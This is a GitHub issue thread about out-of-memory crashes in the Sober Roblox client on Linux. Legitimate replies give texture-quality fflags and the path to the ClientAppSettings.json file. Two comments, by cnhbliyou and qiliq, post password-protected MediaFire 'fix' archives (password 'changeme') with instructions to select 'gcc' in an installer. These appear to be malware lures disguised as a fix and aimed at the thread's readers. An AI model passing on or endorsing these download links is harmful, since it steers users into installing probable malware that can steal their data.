### ISSUE TITLE
Ram memory allocate is very small

### ISSUE THREAD

**Issue by Supply12** [vinegarhq/sober#175]
### Acknowledgement of checking existent issues

- [X] I have checked if my issue has already been reported, and I am certain that my problem has not already been addressed.

### What problem did you encounter?

I run sober, can play all experiences i played, but not one because memory allocate
16 gb pc, free is 5 gb without sober

Log:
```
2024-08-27T21:18:51.131Z,26.131927,852006c0,6 [LOGCHANNELS + 1] RBXCRASH: OutOfMemory (Failed to allocate memory. size = 5594112, alignment = 1024)
RBXCRASH: OutOfMemory (Failed to allocate memory. size = 5594112, alignment = 1024)

```

### Roblox Experience link

https://www.roblox.com/games/4991214437/town

**Comment by tunis4** [comment]
this happens due to running out of vram. as a workaround you can reduce the texture quality with these fflags:
```json
"DFIntTextureQualityOverride": "2",
"DFFlagTextureQualityOverrideEnabled": "True"
```

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Supply12** [comment]
> ```json
> "DFIntTextureQualityOverride": "2",
> "DFFlagTextureQualityOverrideEnabled": "True"
> ```

Hi, but where i do set this in sober flatpak?

**Comment by alejandro-alzate** [comment]
@Supply12 Hey he responded this to me, take a look.
> > ```json
> > "DFIntTextureQualityOverride": "2",
> > "DFFlagTextureQualityOverrideEnabled": "True"
> > ```
> 
> Hi, but where i do set this in sober flatpak?

https://github.com/vinegarhq/sober/issues/208#issuecomment-2345249904

**Comment by JimBimBum** [comment]
> @Supply12 Hey he responded this to me, take a look.
> 
> > > ```json
> > > "DFIntTextureQualityOverride": "2",
> > > "DFFlagTextureQualityOverrideEnabled": "True"
> > > ```
> > 
> > 
> > Hi, but where i do set this in sober flatpak?
> 
> [#208 (comment)](https://github.com/vinegarhq/sober/issues/208#issuecomment-2345249904)

/home/(user)/.var/app/org.vinegarhq.Sober/data/sober/exe/ClientSettings/ClientAppSettings.json also it's formatted incorrectly. idk why it's different than how fflags are normally handled but i don't make the rules either.

```
"DFIntTextureQualityOverride": 2,
"DFFlagTextureQualityOverrideEnabled": true
```
